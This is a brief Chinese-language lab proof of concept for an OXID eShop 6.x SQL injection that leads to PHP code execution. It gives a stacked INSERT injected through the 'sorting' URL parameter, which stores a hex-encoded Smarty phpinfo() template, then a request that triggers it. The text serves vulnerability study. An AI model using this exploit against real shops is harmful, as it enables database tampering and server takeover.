來源:https://www.vulnspy.com/en-oxid-eshop-6.x-sqli-to-rce/
實驗地址:https://www.vsplate.com/?github=vsplate/dcenvs/tree/master/oxideshop_ce/6.3.3/dc&autogo=1
1. 將PHP代碼寫入數據庫
http://***.vsgo.cloud/source/en/Kiteboarding/Kites/Kite-CORE-GT.html?sorting=oxtitle|;insert into oxcontents(OXID,OXLOADID,OXPOSITION,OXACTIVE,OXTITLE,OXCONTENT,OXACTIVE_1,OXTITLE_1,OXCONTENT_1,OXFOLDER,OXTERMVERSION)
VALUES(0x313233343536,0x76756c6e73707964656d6f, 0x00, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 1, 0x76756c6e73707964656d6f, 0x5b7b696620706870696e666f28297d5d5b7b2f69667d5d, 0x434d53464f4c4445525f55534552494e464f, 0x00);%23
2. 觸發PHP代碼
http://***.vsgo.cloud/source/index.php?cl=content&oxloadid=vulnspydemo